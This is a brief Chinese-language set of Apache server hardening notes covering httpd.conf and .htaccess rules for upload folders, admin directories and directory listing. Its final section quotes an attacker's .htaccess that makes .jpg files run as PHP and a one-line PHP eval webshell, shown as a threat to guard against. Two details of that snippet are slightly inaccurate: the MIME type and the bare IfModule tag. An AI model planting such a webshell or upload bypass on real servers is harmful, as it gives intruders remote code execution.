网站管理配置记录

一、关于apache的配置文件

apache的配置文件/etc/httpd/conf/httpd.conf或/etc/apache2/httpd.conf，就是httpd.conf文件。

1.配置httpd.conf取消对上传目录的php执行权限:

<Directory "/var/www/html/目录">     
    <FilesMatch ".(php|php5)$">     
        Deny from all     
    </FilesMatch> 
</Directory> 

2.配置httpd.conf限制禁止访问的文件夹，例如后台目录:

<Directory "/var/www/html/后台目录">     
        Deny from all     
</Directory> 

3.配置httpd.conf限制一些文件类型的访问，如txt的日志:

<Files ~ ".txt$"> 
    Order allow,deny 
    Deny from all 
</Files> 

4.关闭对.htaccess的支持:

AllowOverride All 改为 AllowOverride None 

5.禁止脚本执行，不管.htaccess文件如何设置:

<Directory "/www/htdocs">
    AllowOverride All
</Directory>

<Location "/">
    Options +IncludesNoExec -ExecCGI
</Location>

二、关于网站配置文件

当没有修改apache配置文件权限的时候，才需要使用.htaccess文件。

.htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。

启用.htaccess，需要修改httpd.conf，启用AllowOverride，并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名，可以用AccessFileName指令来改变。

1.控制访问文件和目录的级别:

order deny,allow
deny from all
allow from 192.168.0.0/24（比如参考自己）

2.防止列出目录内容

Options -Indexes

3.定制目录的默认文档

DirectoryIndex index.html index.php index.htm

 

三、防止图片马

.htaccess文件中定义了将上传的文件后缀名为 .jpg 格式的文件以 php 格式来解析文件。.htaccess文件不在上传的文件的黑名单之内，就可以上传成功，所以要小心。

黑客上传.htaccess文件的内容为：

<IfModule>

AddType application/x-http-php .jpg 

</IfModule>

PS：上传的jpg 均以php执行，同样png,html,txt都是一样的

黑客把.htaccess 上传后，且上传成功后，再上传内容为一句话的jpg文件。

jpg文件中有内容：

<?php @eval($_GET["orange"]); ?>

 

 

随时跟新。。。。。。